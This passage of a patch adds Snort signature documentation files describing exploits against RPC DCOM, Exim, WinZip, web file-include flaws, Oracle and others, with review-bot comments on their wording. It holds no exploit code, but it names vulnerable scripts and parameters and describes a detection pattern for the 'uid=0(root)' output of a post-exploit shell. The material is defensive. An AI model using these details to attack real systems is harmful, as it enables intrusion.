+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
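Review bot: "Expoit code exists" under Ease of Attack should be "Exploit code exists". Attack Scenarios ("a request for a file with an overly long filename via a network share") and Detailed Information ("malformed data via RPC") read as two different vulnerabilities; add a sentence explaining how the overly long filename reaches the RPC DCOM service so the reader sees they describe one issue. Additional References is empty for a Microsoft vulnerability with a vendor bulletin; add it rather than leaving the section blank.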
--- /dev/null
+++ b/doc/signatures/2593.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2593
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
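Review bot: The "--" after False Negatives ("None known." followed directly by "--") is missing the blank line that precedes every other separator in the file, and "Additional References" lacks the trailing colon the other entries use; "Rule:" and "Sid:" are each followed by two blank lines where the other files use one. Content-wise, Detailed Information identifies header-syntax verification in the message body as the non-default precondition for the overflow; Corrective Action should mention turning that option off as a mitigation alongside upgrading past 4.34.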
--- /dev/null
+++ b/doc/signatures/2487.txt
@@ -0,0 +1,63 @@
+Rule:
+--
+
+Sid:
+2487
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow 
+associated with winzip's processing of certain MIME archive files. 
+
+--
+Impact:
+A successful attack may permit a buffer overflow that allows the execution
+of arbitrary code at the privilege level of the user running winzip.
+
+--
+Detailed Information:
+Winzip is a program that is used for file compression on Windows hosts.
+A buffer overflow exists when parsing specific header fields for certain 
+MIME file types.  An overly long value passed to specific Content-Type attributes
+may trigger the buffer overflow and allow the execution of arbitrary code
+in the context of the user running winzip.
+
+--
+Affected Systems:
+Winzip 6.x, 7.x, 8.0, 8.1 SR-1, 8.1, Winzip 9.0 beta versions
+
+--
+Attack Scenarios:
+An attacker can entice a user to open a malformed MIME file that will
+invoke winzip to process it, possibly causing a a buffer overflow 
+and the subsequent execution of arbitrary code on the vulnerable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://securityfocus.com/bid/9758
+
+--
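Review bot: The "--" separator sits directly under "Rule:" with the blank line after it, the reverse of every other file in the patch; move the blank line above the separator. "a a buffer overflow" under Attack Scenarios should be "a buffer overflow", and "Additional References" needs its colon. Affected Systems lists "8.1 SR-1, 8.1" out of order; list 8.1 before 8.1 SR-1 so the range reads correctly. Detailed Information says "Content-Type attributes" in the plural; name the attributes the rule keys on, or say "certain Content-Type attributes" as the Summary does.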
--- /dev/null
+++ b/doc/signatures/100000391.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000391
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "vacadma.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "vacadma.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
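Review bot: "may indicate that an exploitation attempt has been attempted" in Summary is redundant; "may indicate an exploitation attempt" suffices. Detailed Information puts the generic CGI paragraph ("running ona web server", with the typo) after the specific description of the babInstallPath include; the specific paragraph already states what the event indicates, so the generic one should be moved ahead of it or dropped. The file also opens with two blank lines before "Rule:" and has trailing whitespace on the Summary line, and Additional References is empty although Summary names a specific script and parameter.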
--- /dev/null
+++ b/doc/signatures/572.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+572
+
+--
+Summary:
+This event is generated when an attempt is made to disable the rpc.ttdbservd service.
+
+--
+Impact:
+Denial of service.  A successful attack may kill the ToolTalk database server.
+
+--
+Detailed Information:
+The ttdbserverd RPC service, more commonly known as the ToolTalk database server, allows applications to communicate in the Common Desktop Environment (CDE).  The ToolTalk service receives ToolTalk messages created and sent by applications and delivers them to the appropriate recipient applications.  The ToolTalk database server is enabled by default on hosts with CDE.  Due to an implementation fault in rpc.ttdbserverd, it is possible for a malicious remote client to formulate an RPC message that will cause the server to crash.   
+
+--
+Affected Systems:
+HP HP-UX 10.10, 10.20, 10.30, 11.0
+IBM AIX 4.1, 4.1.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.2, 4.2.1, 4.3
+SGI IRIX 5.2, 5.3, 6.0, 6.0.1, 6.2, 6.3, 6.4
+Sun Solaris 1.1, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.2, 2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.5.1, 2.6
+
+--
+Attack Scenarios:
+An attacker can attempt a denial of service attack by causing a vulnerable ToolTalk database server to crash.   
+
+--
+Ease of Attack:
+Easy.  Exploit scripts are freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0003
+
+Bugtraq
+http://www.securityfocus.com/bid/122
+
+Arachnids:
+http://www.whitehats.com/info/IDS241
+
+--
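Review bot: The service is named three ways: "rpc.ttdbservd" in Summary, "ttdbserverd" and "rpc.ttdbserverd" in Detailed Information; settle on one spelling (Detailed Information's rpc.ttdbserverd) so a search for the daemon name finds the file. Summary says an attempt to "disable" the service while Impact and Detailed Information describe a crash; "crash" is the precise term. Under Additional References, "CVE" and "Bugtraq" lack the colon that "Arachnids:" carries, and several lines end in trailing whitespace.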
--- /dev/null
+++ b/doc/signatures/688.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
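Review bot: The Sid field is empty; it must read 688 to match the file name. Attack Scenarios ("Simple. These are SQL database commands.") answers the Ease of Attack question and gives no scenario; describe one, for instance the command arriving from a source outside the protected network, which is what False Positives and Corrective Action already assume. The sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell ..." is copied from the id-command entry (498.txt) and does not fit SQL traffic; drop or reword it. The Affected Systems section is missing entirely, and the second Corrective Action line needs a comma after "session" and a final period.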
--- /dev/null
+++ b/doc/signatures/2774.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2774
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_number
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
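Review bot: The lines "vulnerability in the procedure drop_priority_number" / ". This procedure is included in" have a stray line break that leaves the period at the start of the next line; join them so the text reads "... drop_priority_number. This procedure is included in dbms_repcat." Affected Systems reads "Oracle Oracle9i"; drop the duplicated vendor name. Corrective Action lacks a period, several headers carry trailing whitespace, and Additional References is empty although Summary calls this a known vulnerability.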
--- /dev/null
+++ b/doc/signatures/1862.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1862
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
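Review bot: Affected Systems is empty; either list the affected software or state "All systems using an FTP server", which is what the rest of the file implies. Detailed Information names web servers, web applications and FTP servers while Attack Scenarios only covers browsing outside the ftp root; make the two consistent with what Sid 1862 actually inspects. "technique, to browse" has a stray comma, the first Corrective Action line lacks a period, and Additional References is empty.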
--- /dev/null
+++ b/doc/signatures/2427.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2427
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
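Review bot: "ISC INN 2.4 .0" under Affected Systems has a stray space; it should read "ISC INN 2.4.0". "attackers choosing" in Detailed Information should be "attacker's choosing", and the second Corrective Action line lacks a period. Additional References is empty for what Summary calls a known vulnerability; add the vendor or Bugtraq reference.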
--- /dev/null
+++ b/doc/signatures/3298.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3298
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
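Review bot: This file is identical to 3358.txt in this patch, including the "Expoit code exists" misspelling and the empty Additional References, yet documents a different Sid. State what distinguishes 3298 from 3358 (a different port, transport or request variant), otherwise one of the two documents is redundant; the corrections noted for 3358.txt apply here as well.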
--- /dev/null
+++ b/doc/signatures/1969.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1969
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
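Review bot: "attackers choosing" in Impact should be "attacker's choosing", and "Web server" in Detailed Information should be lowercase to match the rest of the file. "the attack scenarios are legion" is out of register for a signature document; "many attack scenarios exist" says the same. As with the other generic web entries in this patch, nothing here identifies what Sid 1969 matches, and Additional References is empty while Ease of Attack claims "Exploits exist".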
--- /dev/null
+++ b/doc/signatures/1655.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1655
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
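Review bot: A third copy of the 1496.txt/1174.txt text, with the same "running ona web server" typo, "attackers choosing", and empty Additional References; apply the same fixes and add the script name and reference specific to Sid 1655.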
--- /dev/null
+++ b/doc/signatures/498.txt
@@ -0,0 +1,82 @@
+Rule:  
+
+--
+Sid:
+498
+
+-- 
+
+Summary: 
+This event is generated by the use of a UNIX "id" command. This may be 
+indicative of post-compromise behavior where the attacker is checking 
+for super user privileges gained by a sucessful exploit against a 
+vulnerable system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained super user access to the system.
+
+--
+Detailed Information:
+This event is generated when a UNIX "id" command is used to confirm the
+user name of the currenly logged in user over an unencrypted connection. 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+The string "uid=0(root)" is an output of an "id" command indicating that
+the user has "root" privileges.  Seeing such a response indicates that
+some user, connected over the network to a target server, has root privileges.
+
+--
+
+Attack Scenarios: 
+A buffer overflow exploit against an FTP server results in "/bin/sh"
+being executed. An automated script performing an attack, checks for the
+success of the exploit via an "id" command.
+
+-- 
+
+Ease of Attack: 
+Simple. This may be post-attack behavior and can be indicative of the
+successful exploitation of a vulnerable system.
+
+-- 
+
+False Positives: 
+This rule will generate an event if a legitimate system administrator
+executes the "id" command over an unencrypted connection to verify the
+privilege level available to him.
+
+This rule may also generate event by viewing the documentation on
+snort.org or any other security related web site which may contain
+details on this issue.
+
+The web site www.bugtraq.org serves a non-standard HTTP header of the
+form "X-Mandatory-Snort-Alert: *GOBBLE* uid=65534(nobody) uid=0(root)"
+browsing this site will generate an event.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional false positive information contributed by Arnd Fischer
+
+-- 
+Additional References:
+
+--
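Review bot: the False Positives sentence "This rule may also generate event by viewing the documentation on snort.org" is missing an article and misattributes the action; suggest "This rule may also generate an event when a user views documentation on snort.org or any other security related web site that contains details on this issue." Spelling elsewhere in the entry: "sucessful" in the Summary and "currenly" in Detailed Information. The Corrective Action line "Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise" needs a comma before "then" and a terminating full stop.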
--- /dev/null
+++ b/doc/signatures/100000331.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000331
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "ZixForum" application running on a webserver. Access to the file "settings.asp" using a remote file being passed as the "layid" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "layid" parameter in the "settings.asp" script used by the "ZixForum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ZixForum
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
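Review bot: the third Detailed Information paragraph (the generic "validating the credentials of a client host" text) and the Attack Scenarios paragraph describe credential abuse, not the remote file include on the "layid" parameter of "settings.asp" that the Summary documents; reword both around file inclusion or drop the generic text. Also "running ona web server" should be "running on a web server", "the attackers choosing" needs an apostrophe (twice), and "an exploitation attempt has been attempted" is redundant ("that exploitation has been attempted"). Additional References is empty for a named product; cite the vendor advisory or vulnerability database entry if one exists.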
--- /dev/null
+++ b/doc/signatures/122-13.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-13
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ips
+filtered protocol scan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
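Review bot: the Summary's "an ips filtered protocol scan" looks like a typo for "an IP filtered protocol scan"; please confirm against the event type list in README.sfportscan, which the entry itself cites. Spelling: "reconnaisance" in Impact and "consititute" in Detailed Information. In Corrective Action, "Apply any appropriate vendor supplied patches as appropriate" repeats "appropriate"; one is enough.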
--- /dev/null
+++ b/doc/signatures/2580.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2580
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a heap overflow
+associated with Apache 1.3 proxy and cache module.
+
+--
+Impact:
+A successful attack may cause a heap overflow, permitting the execution of
+arbitrary code.
+
+--
+Detailed Information:
+When Apache 1.3 is used and the host is configured to be a web proxy,
+reverse proxy and/or cache server, a vulnerability exists that may
+allow a heap overflow and the subsequent execution of arbitrary code
+on the vulnerable server.  This may occur when the server receives
+a malformed response from a malicious web server that includes a
+negative content length value.  This can cause invalid memory access
+and a denial of service or heap overflow.
+
+--
+Affected Systems:
+Apache 1.3.x
+
+--
+Attack Scenarios:
+An attacker can entice a user to visit a malicious web server.  If
+a vulnerable server proxies the request and receives a malformed
+response, a heap overflow may occur.
+
+--
+Ease of Attack:
+Simple. Exploit code is publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0492
+
+Other:
+http://www.guninski.com/modproxy1.html
+
+--
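Review bot: the "Additional References" heading is missing its trailing colon, unlike every other entry in this patch; make it "Additional References:" so anything that keys on the section label stays consistent. Corrective Action says "Upgrade to the latest non-affected version of the software" while Affected Systems is "Apache 1.3.x"; if the fixed 1.3 release is known it should be named, otherwise the advice reads as "leave the 1.3 branch entirely", which may not be what is meant.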
--- /dev/null
+++ b/doc/signatures/2294.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2294
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
